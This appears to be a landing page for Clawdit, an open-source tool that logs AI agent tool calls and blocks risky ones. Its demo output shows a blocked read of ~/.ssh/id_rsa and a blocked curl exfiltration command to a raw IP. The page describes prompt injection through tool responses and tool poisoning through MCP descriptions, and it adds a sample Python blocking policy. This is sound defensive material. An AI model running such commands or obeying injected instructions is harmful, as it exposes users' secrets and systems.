Open source · Local-first · Zero infrastructure

See what your AI agent really did.

Clawdit is an open-source runtime security tool that intercepts, logs, and enforces policies on every tool call your AI agent makes. The black box recorder for the agentic era.

$ clawdit watch
[clawdit] intercepting agent tool calls...
 
ALLOW read_file → /project/src/index.ts
ALLOW web_search → "react hook patterns"
BLOCK read_file → ~/.ssh/id_rsa
FLAG api_call → response contains API key pattern
BLOCK shell_exec → curl http://91.92.242.30/exfil
 
AUDIT 3 blocked · 1 flagged · 47 allowed · session: 12m
$ clawdit report --format html
Done → audit-report-2026-02-17.html

Works with every agent framework

Claude Code, OpenClaw, Cursor, Windsurf, CrewAI, LangChain
// the problem

Your agents have full system access.
You have zero visibility.

AI agents can read your files, call APIs, execute code, and access secrets. When something goes wrong, there's no audit trail, no policy enforcement, and no way to replay what happened.

82%

of MCP servers have path traversal flaws

Endor Labs found that 82% of 2,614 MCP server implementations have file system operations prone to path traversal. Your agent's tools are the attack surface.

84.2%

tool poisoning attack success rate

Hidden instructions in MCP tool descriptions succeed 84.2% of the time when agents have auto-approval enabled. Scanners can't catch what happens at runtime.

0

open-source runtime firewalls exist

Every runtime protection solution is commercial and enterprise-only. Developers and hackers have no open-source tool to enforce policies on agent tool calls in real time.

// how it works

One binary. Zero config. Full visibility.

01

Install in seconds

Single binary, no dependencies. Works on macOS, Linux, Windows. No cloud account, no API keys, no infrastructure.

brew install clawdit
02

Intercept every tool call

Clawdit sits between your agent and its tools as a transparent proxy. It captures every request, response, and decision chain — locally on your machine.

clawdit watch
03

Enforce policies with YAML rules

Write declarative rules: block SSH key access, flag secret leaks, rate-limit tool calls. Ship with sensible defaults. Contribute rules to the community.

clawdit scan --rules owasp-agents
04

Query and report

Search your audit log by date, tool, agent, or anomaly. Export compliance reports that map directly to OWASP and AIUC-1 requirements.

clawdit report --format html
// what clawdit catches

Runtime threats that scanners miss.

Prompt injection at runtime

Agent gets hijacked mid-session by hidden instructions in tool responses, emails, or documents. Clawdit detects the behavioral deviation and blocks it.

Secret exfiltration

Agent reads ~/.ssh, .env, or API keys and tries to send them outbound. Policy rules catch the pattern and block the call before data leaves your machine.

Anomalous behavior

Agent calls fetch_customer_records 500 times in 2 minutes. Baseline is 5/hour. Clawdit flags the spike and auto-throttles before damage is done.

Tool poisoning & rug pulls

MCP tool descriptions change after approval, or clean tools get chained into malicious sequences. Clawdit monitors tool schemas and blocks unauthorized changes.
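
The rule types named above (block SSH key access, flag secret leaks, rate-limit tool calls) can be expressed as one decision function over intercepted calls. This is an added example, not Clawdit's code or rule format; the Policy class, the rule constants and the sample values are assumptions made for illustration.

```python
import os
import re
import time
from collections import defaultdict, deque

# Hypothetical rule values for illustration; not Clawdit's rule format.
PROTECTED_DIRS = ["~/.ssh"]              # directories the agent may never read
PROTECTED_NAMES = {".env"}               # file names blocked wherever they live
SECRET_RE = re.compile(r"AKIA[0-9A-Z]{16}|-----BEGIN [A-Z ]*PRIVATE KEY-----")
MAX_CALLS, WINDOW_S = 5, 3600            # per-tool baseline: 5 calls per hour


class Policy:
    def __init__(self, home, clock=time.monotonic):
        self.home, self.clock = home, clock
        self.roots = [self._resolve(d) for d in PROTECTED_DIRS]
        self.history = defaultdict(deque)  # tool name -> recent call times

    def _resolve(self, path):
        # Expand "~" and collapse "../" and symlinks BEFORE matching, so a
        # traversal such as /project/../home/dev/.ssh/id_rsa cannot slip past.
        if path == "~" or path.startswith("~/"):
            path = self.home + path[1:]
        return os.path.realpath(path)

    def decide(self, tool, arg, response=""):
        """Return (verdict, reason) for one intercepted tool call."""
        now = self.clock()
        calls = self.history[tool]
        calls.append(now)
        while now - calls[0] > WINDOW_S:   # drop calls outside the window
            calls.popleft()
        if tool == "read_file":
            path = self._resolve(arg)
            in_root = any(path == r or path.startswith(r + os.sep)
                          for r in self.roots)
            if in_root or os.path.basename(path) in PROTECTED_NAMES:
                return "BLOCK", "sensitive-path"
        if len(calls) > MAX_CALLS:
            return "BLOCK", "rate-limit"
        if SECRET_RE.search(response):
            return "FLAG", "secret-in-response"
        return "ALLOW", ""
```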

// roadmap

Here's what's coming.

Built in public. Designed for contributors.

NOW

Phase 1 — Local CLI (Building now)

Single binary installs via brew or go install. Intercepts agent tool calls, logs everything to local SQLite, provides a query interface and HTML audit report generator. Works with any agent framework. No server, no cloud, no account.

NEXT

Phase 2 — Observability Dashboard (Q2 2026)

MCP proxy mode with full transport interception. YAML policy engine with community-contributed detection rules. Real-time anomaly detection and alerting. Self-hosted dashboard for visualizing agent behavior across sessions.

LATER

Phase 3 — Enterprise Compliance (H2 2026)

AIUC-1 and OWASP compliance report mapping. Centralized log aggregation for teams. SIEM integrations (Datadog, Splunk, Sentinel). Tamper-proof audit trails with cryptographic signing. SSO and RBAC for enterprise deployments.

// early access

Be first to audit your agents.

Join the waitlist. Get early access to the CLI, contribute rules, and help shape the roadmap.
